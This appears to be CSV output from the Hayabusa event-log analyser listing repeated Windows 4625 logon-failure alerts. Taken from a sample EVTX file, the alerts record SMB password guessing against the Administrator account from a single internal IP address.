2016-09-20 01:52:39.900 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dK0N5KeBgCze1YWi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.029 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: g4dHlwZjMzI5wU2s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.075 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GzF2ouP5KkRfsxnf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RSQxMrGlDiAOo6ri : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gL0rz3p1yG6RhfAT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oyChoTSKgJeK6yqs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.234 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tG4I11dwpBM9SM3l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B7foAZ5Y1igCbHap : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.327 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ATDXUljQwg8WvUVs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QdmXaJqQMAG2g6Ao : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.413 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bjame5puT5CDeoIG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.454 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0FGGVVkckmdURVh6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.485 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j0Smqw4cA4wG2Q6m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KLWloOhUYEQlj6y6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9Tuxuykh0j5afeTH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.609 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aeXS6QwYhqJAOeuz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AqFSJCq5bmBW6dj1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.718 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DH1zyt1hxTgzajhW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.761 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rrZxcWjUX4OgYYIb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.807 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ExtkYXSJI8F41uvw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sLh1Q3RieOoukiCT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.881 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kNb2hZDxi4QrbQpx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.923 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jCb1TMlFj2PjH2sA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:40.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rgF42C57Nx6F3HU3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KZfFH9geIrxVYowJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.039 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pWz1XeyxywR0o5gS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: og1kItEC6WhqXF37 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.121 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q0KhaJlD6tWwF2ky : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.165 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XUy0EKmjyD6ZYENA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h3MdGstPPFJDGzwG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VTs0ZQa6LGrKZKsY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FefzWjMXSvMdvqcw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.345 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hlnUt9tPRSXR5mWs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.384 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dehb4M6pcxi56Bkl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tLXHvGiUqZyxax4W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bP1gKcf1eeKm0RB1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ldbN1odP77n0BOzO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.562 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: drRC8qCbPe5e4mdR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.607 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lBg39AUtzZi6Q4iz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.650 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: huv5YEPo1n7UiFkq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.693 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9CLLwao1NDtBulxs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SB88EHHhDWhvJI87 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.782 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VtBvklueV4MZo3pJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: noha7Vw85VfURHik : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wl5eIYvoKpJGUcSl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.921 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bsS3JTLUWcFYvxAE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:41.957 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gjM6hj2bGxC124oZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V3IQkVcY5iMTxCRN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.045 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: v44Kp3lpGKb6Xd4j : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.082 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 7e1skdEmGlXbzUWk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.181 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: feaA6lAxWjapFbAW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IJZjTqY5innWcvSZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.273 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ymXIp0KTw0vIbB0N : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZpPJEcLv7BoZaQwT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.357 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Cz14Cv861RhFh0Pa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: H8BklDHdS0cdcbGu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.424 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0m5Mznl2khRMj31V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.472 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ha6TuN7C8V0roSAK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.517 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9oBW0yE5a9zSkpIH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.566 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n54EaKOUQIX9geqx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.617 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: m6WCg3o4oatO42wW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.656 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KfCwo8ZUWiBqI8zC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.692 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8potisENMIsbNxcd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.732 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WgagMNj95dkg9uQd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.774 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: o1EVsGLFugwePvgR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.816 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6q00SeueJQAiBGpe : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.861 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QWzSR1cJ2XJNirSW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.904 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 39MY5ZvRJSHVkZZV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.944 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WyOdltctwdHNkH6i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:42.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OUcWk0xJn9zVMZSF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.023 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: f2sauqNlJi3y0ZBk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.060 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bkih5QcLlcjw9gjg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.104 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3KlUJslcpS9jhLY4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: riuVWV1Ugr9c22hR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:52:43.189 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5OSj1I0sXkPf96OL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
